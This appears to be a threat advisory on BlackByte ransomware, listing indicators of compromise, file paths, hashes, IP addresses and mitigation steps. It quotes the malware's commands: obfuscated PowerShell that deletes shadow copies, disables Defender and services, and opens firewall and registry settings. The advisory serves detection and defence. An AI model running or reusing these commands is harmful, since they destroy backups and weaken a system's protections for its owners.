Ransomware is a type of malicious software, or malware, that prevents a user from accessing computer files, systems, or networks until a ransom is paid for their return. Ransomware incidents can cause costly disruptions to operations and lead to the loss of critical information and data. BlackByte ransomware operates as a service wherein the extortion profit is shared between the Ransomware as a Service (RaaS) owners and their affiliates. The affiliates are the entities that actually execute the computer intrusion and deploy the ransomware. Each affiliate uses its own intrusion method and negotiates the terms of the ransom demands with the victim. BlackByte is a group that encrypts files on compromised Windows host systems, including physical and virtual servers.

Technical Details

The BlackByte executable leaves a ransom note in all directories where encryption occurs. The ransom note includes the .onion site that contains instructions for paying the ransom and receiving a decryption key. Some victims reported the actors used a known Microsoft Exchange Server vulnerability as a means of gaining access to their networks. Once in, actors deploy tools to move laterally across the network and escalate privileges before exfiltrating and encrypting files. In some instances, BlackByte ransomware actors have only partially encrypted files. In cases where decryption is not possible, some data recovery can occur. Previous versions of BlackByte ransomware downloaded a .png file from IP addresses 185.93.6.31 and 45.9.148.114 prior to encryption. A newer version encrypts without communicating with any external IP addresses. BlackByte ransomware runs executables from c:\windows\system32\ and C:\Windows\. Process injection has been observed on processes it creates.

The following indicators of compromise are assessed to be associated with BlackByte activity, suspicious files discovered in the following locations:

  • Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946
  • inetpub\wwwroot\aspnet_client
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium

The filenames for suspicious ASPX files appeared to have the following naming conventions:

  • <5 random alphabetical characters>.aspx
  • error<2 capital letters>.aspx
  • iismeta<4 random numbers>.aspx

Suspicious files were also discovered at:

  • %AppData%\BB.ico  (This file is the icon given to files with a .blackbyte file extension)
  • %AppData%\BlackByteRestore.txt  (This file is the ransom note that is left in every folder where files are encrypted)
  • %AppData%\dummy  (This file is a text file containing a list of machine names that can be reached on the network)
  • %HOMEPATH%\complex.exe  (This file is the ransomware executable)
  • Users\tree.dll  (This file contains the message “Your HACKED by BlackByte team. Connect us to restore your system.”)

Scheduled tasks may be created and artifacts have been observed at:

  • Windows\System32\Tasks:
  • C:\Users\\complex.exe -single .  (This command appears to launch the ransomware)
  • C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll.  (This command attempts to open tree.dll in wordpad 75 times and then prints the contents)

IIS logs contain GET and POST requests to various malicious ASPX files that follow a pattern of “/.aspxexec_code=Response.Write”

Below is a list of hashes of suspicious files that have been observed on systems affected by BlackByte ransomware:

MD5 Hashes
4d2da36174633565f3dd5ed6dc5033c4   959a7df5c465fcd963a641d87c18a565
cd7034692d8f29f9146deb3641de7986   5f40e1859053b70df9c0753d327f2cee
d63a7756bfdcd2be6c755bf288a92c8b   df7befc8cdc3c5434ef27cc669fb1e4b
eed7357ab8d2fe31ea3dbcf3f9b7ec74   51f2cf541f004d3c1fa8b0f94c89914a
695e343b81a7b0208cbae33e11f7044c   d9e94f076d175ace80f211ea298fa46e
296c51eb03e70808304b5f0e050f4f94   8320d9ec2eab7f5ff49186b2e630a15f
0c7b8da133799dd72d0dbe3ea012031e   cea6be26d81a8ff3db0d9da666cd0f8f
a77899602387665cddb6a0f021184a2b   31f818372fa07d1fd158c91510b6a077
1473c91e9c0588f92928bed0ebf5e0f4   d9e94f076d175ace80f211ea298fa46e
28b791746c97c0c04dcbfe0954e7173b   a9cf6dce244ad9afd8ca92820b9c11b9
52b8ae74406e2f52fd81c8458647acd8   7139415fecd716bec6d38d2004176f5d
1785f4058c78ae3dd030808212ae3b04   c13bf39e2f8bf49c9754de7fb1396a33
b8e24e6436f6bed17757d011780e87b9   5c0a549ae45d9abe54ab662e53c484e2
8dfa48e56fc3a6a2272771e708cdb4d2   ad29212716d0b074d976ad7e33b8f35f
4ce0bdd2d4303bf77611b8b34c7d2883   d4aa276a7fbe8dcd858174eeacbb26ce
c010d1326689b95a3d8106f75003427c   9344afc63753cd5e2ee0ff9aed43dc56
ae6fbc60ba9c0f3a0fef72aeffcd3dc7   e2eb5b57a8765856be897b4f6dadca18
405cb8b1e55bb2a50f2ef3e7c2b28496   58e8043876f2f302fbc98d00c270778b
11e35160fc4efabd0a3bd7a7c6afc91b   d2a15e76a4bfa7eb007a07fc8738edfb
659b77f88288b4874b5abe41ed36380d   e46bfbdf1031ea5a383040d0aa598d45
151c6f04aeff0e00c54929f25328f6f7

Below is a list of observed commands that were executed by complex.exe:

  • cmd.exe /c powershell -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘VwBpA’+’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x”
  • schtasks.exe /DELETE /TN “\”Raccine Rules Updater\”” /F
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x
  • sc.exe config SQLTELEMETRY start= disabled sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
  • sc.exe config SQLWriter start= disabled
  • sc.exe config SstpSvc start= disabled
  • powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
  • sc.exe config MBAMService start= disabled
  • sc.exe config wuauserv start= disabled
  • sc.exe config Dnscache start= auto
  • sc.exe config fdPHost start= auto
  • sc.exe config FDResPub start= auto
  • sc.exe config SSDPSRV start= auto
  • sc.exe config upnphost start= auto
  • sc.exe config RemoteRegistry start= auto
  • cmd.exe /c netsh advfirewall firewall set rule “group=\”Network Discovery\”” new enable=Yes
  • cmd.exe /c netsh advfirewall firewall set rule “group=\”File and Printer Sharing\”” new enable=Yes
  • cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
  • cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  • cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
  • mountvol.exe A: \\?\Volume{d7e47829-0000-0000-0000-100000000000}\
  • mountvol.exe B: \\?\Volume{d7e47829-0000-0000-0000-b0e213000000}\
  • mountvol.exe E: \\?\Volume{fce79ce0-b01f-11e6-b968-806e6f6e6963}\
  • powershell.exe Install-WindowsFeature -Name \”RSAT-AD-PowerShell\” – IncludeAllSubFeature
  • net.exe view
  • arp.exe -a
  • powershell.exe Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name
  • notepad.exe %appdata%\RestoreMyFiles_BlackByte.txt
  • cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del C:\Users\REM\Desktop\hybrid-9-8\complex.exe

The base64 encoded string in the following command:
powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x

Decodes to:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

The base64 encoded string in the following command:
cmd.exe /c powershell -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘VwBpA’+’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name$x;Set-Service -StartupType Disabled $x”

Mitigation strategies

Implement regular backups of all data to be stored as air gapped, password protected copies offline. Ensure these copies are not accessible for modification or deletion from any system where the original data resides.

Implement network segmentation, such that all machines on your network are not accessible from every other machine.

Install and regularly update antivirus software on all hosts, and enable real time detection.

Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.

Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.

Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.

Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.

Consider adding an email banner to emails received from outside your organization.

Disable hyperlinks in received emails.

Use double authentication when logging into accounts or services.

Ensure routine auditing is conducted for all accounts.

Ensure all the identified indicators of compromise are input into the network SIEM for continuous monitoring and alerts.